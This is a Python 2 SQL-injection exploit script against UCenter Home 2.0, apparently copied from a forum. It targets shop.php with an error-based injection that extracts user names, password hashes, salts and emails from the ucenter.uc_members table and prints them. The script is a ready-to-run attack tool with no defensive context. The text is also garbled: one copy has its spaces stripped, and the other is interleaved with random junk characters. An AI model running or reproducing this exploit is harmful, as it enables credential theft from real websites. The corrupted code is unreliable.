#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl. Z) q; I4 P0 k/ J4 }3 E$ {
1 P& t B) l& s4 h
" F) k# c/ S9 Y" q$ G# E9 J' d
#!/usr/bin/env python & w2 I4 q5 M$ v3 V B
) ?4 ]! _- J) e9 pimport sys 8 m+ _7 t- E) d" v; O
import urllib2 4 ]7 d8 X3 f: [3 j& Y' P
import re
' a7 ^! }3 v! i0 {8 j
8 [+ e8 v1 e4 u( i& o) [def info():
9 c$ I- D6 F* v- q1 V: W print 'From:http://www.exploit-db.com/exploits/14997/' ) K; \9 |, D2 ]7 v5 }: m
print 'http://www.hake.cc/Web_loudong/' # ^$ l5 V/ r8 S* Q4 z# w! P
print 'changed:qiaoy'
/ {( X4 ~- d& t" ^" O print 'exp:'
. l" p8 B; s2 O* v+ O+ m print ' ./UCenter_Home_2.0.py site'
/ }1 b; G F" O 9 e: X* ]. Y) h! _) Y+ e2 Q s
def main():
! a9 j. s7 ~; d3 J( A, @! R if len(sys.argv) != 2:
( [: B: i7 F6 Z- s2 Q. {0 j info() . h2 @! t0 J" j. a1 R0 o' @
else: # a, d' L* t$ P, A
site = sys.argv[1] 8 `. o6 }6 w, t7 V. W2 G
if site[0:7] == 'http://': + s2 _# Q$ b1 Z$ _3 d# P4 g, w
sitesite =site / f7 q' z' B& X# j" G" g
elif site[0:8] == 'https://': & S, G9 K7 S( G. D# F% F
sitesite = site
* o7 e: L4 {( Z) J% P else:
`( T' ]9 t0 }8 _6 c site = 'http://'+site + _. Q3 ]2 V$ B0 {; y0 O, w
try: 2 F5 B1 e2 T% j- _: V
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1' # ~. c, F/ M, ~
Value = urllib2.urlopen(url).read()
1 q$ R4 X- Q* T, @" A0 _# J+ u Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
: u _9 ?( t n6 N: @ hacked = Msg.split(':')
% b* Z9 Y3 C$ d0 v4 L/ f. m print 'Name: '+hacked[1] + F) }6 F$ U6 U) P" q
print 'Passwd: '+hacked[2] ' H9 |0 P( I( O; D$ c. X
print 'salt: '+hacked[3] . h+ C9 \5 u" C/ z
print 'email: '+hacked[4] ( [, L* ?4 A1 U; u
except:
- Y; P E6 V' ~5 r8 I print 'Sorry,I can\'t work............'
4 R: p* q* w2 @+ T- m " s# M( `; P1 |$ V' }( ]& F7 y- Y
if __name__ == '__main__':
' v4 j' v( e! m. Q main() |